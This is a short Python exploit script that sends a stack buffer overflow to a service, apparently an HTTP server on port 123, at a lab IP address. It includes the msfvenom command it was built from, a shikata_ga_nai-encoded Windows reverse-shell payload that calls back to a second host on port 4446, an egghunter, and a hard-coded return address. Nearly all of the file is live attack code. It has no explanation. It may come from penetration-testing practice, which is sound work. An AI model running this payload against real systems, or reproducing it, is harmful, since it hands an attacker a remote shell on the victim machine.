#!/usr/bin/python 
import socket
import sys
import struct

#msfvenom -p windows/shell_reverse_tcp -a x86 --platform windows -b '\x00\x0A\x0D' LPORT=4446 LHOST=192.168.1.163 -e x86/shikata_ga_nai -f python

#Final size of python file: 1684 bytes
buf = ""
buf += "\xdd\xc1\xd9\x74\x24\xf4\xba\xc0\xbf\x38\x21\x5f\x33"
buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x57\x13\x03\x97\xac\xda"
buf += "\xd4\xeb\x3b\x98\x17\x13\xbc\xfd\x9e\xf6\x8d\x3d\xc4"
buf += "\x73\xbd\x8d\x8e\xd1\x32\x65\xc2\xc1\xc1\x0b\xcb\xe6"
buf += "\x62\xa1\x2d\xc9\x73\x9a\x0e\x48\xf0\xe1\x42\xaa\xc9"
buf += "\x29\x97\xab\x0e\x57\x5a\xf9\xc7\x13\xc9\xed\x6c\x69"
buf += "\xd2\x86\x3f\x7f\x52\x7b\xf7\x7e\x73\x2a\x83\xd8\x53"
buf += "\xcd\x40\x51\xda\xd5\x85\x5c\x94\x6e\x7d\x2a\x27\xa6"
buf += "\x4f\xd3\x84\x87\x7f\x26\xd4\xc0\xb8\xd9\xa3\x38\xbb"
buf += "\x64\xb4\xff\xc1\xb2\x31\x1b\x61\x30\xe1\xc7\x93\x95"
buf += "\x74\x8c\x98\x52\xf2\xca\xbc\x65\xd7\x61\xb8\xee\xd6"
buf += "\xa5\x48\xb4\xfc\x61\x10\x6e\x9c\x30\xfc\xc1\xa1\x22"
buf += "\x5f\xbd\x07\x29\x72\xaa\x35\x70\x1b\x1f\x74\x8a\xdb"
buf += "\x37\x0f\xf9\xe9\x98\xbb\x95\x41\x50\x62\x62\xa5\x4b"
buf += "\xd2\xfc\x58\x74\x23\xd5\x9e\x20\x73\x4d\x36\x49\x18"
buf += "\x8d\xb7\x9c\x8f\xdd\x17\x4f\x70\x8d\xd7\x3f\x18\xc7"
buf += "\xd7\x60\x38\xe8\x3d\x09\xd3\x13\xd6\xf6\x8c\x1a\x85"
buf += "\x9f\xce\x1c\xd8\x01\x46\xfa\xb0\xad\x0e\x55\x2d\x57"
buf += "\x0b\x2d\xcc\x98\x81\x48\xce\x13\x26\xad\x81\xd3\x43"
buf += "\xbd\x76\x14\x1e\x9f\xd1\x2b\xb4\xb7\xbe\xbe\x53\x47"
buf += "\xc8\xa2\xcb\x10\x9d\x15\x02\xf4\x33\x0f\xbc\xea\xc9"
buf += "\xc9\x87\xae\x15\x2a\x09\x2f\xdb\x16\x2d\x3f\x25\x96"
buf += "\x69\x6b\xf9\xc1\x27\xc5\xbf\xbb\x89\xbf\x69\x17\x40"
buf += "\x57\xef\x5b\x53\x21\xf0\xb1\x25\xcd\x41\x6c\x70\xf2"
buf += "\x6e\xf8\x74\x8b\x92\x98\x7b\x46\x17\xa8\x31\xca\x3e"
buf += "\x21\x9c\x9f\x02\x2c\x1f\x4a\x40\x49\x9c\x7e\x39\xae"
buf += "\xbc\x0b\x3c\xea\x7a\xe0\x4c\x63\xef\x06\xe2\x84\x3a"
#Payload size: 351 bytes
hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x31\x42\x44\x50\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
payload = "1BDP1BDP" + buf
buffer = ""
buffer = hunter + "A" * (1787 - len(payload) - len(hunter)) + payload + struct.pack("<L",0x71ab2b53) + hunter
buffer += "B" * (2000 - len(buffer)) # * 177


try:
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect=s.connect(('192.168.1.189',123))
    s.send('GET ' + buffer + ' HTTP/1.1\r\n\r\n')
    s.close
    print "Sent!"
    print len(buffer)
except:
    print "Send failed"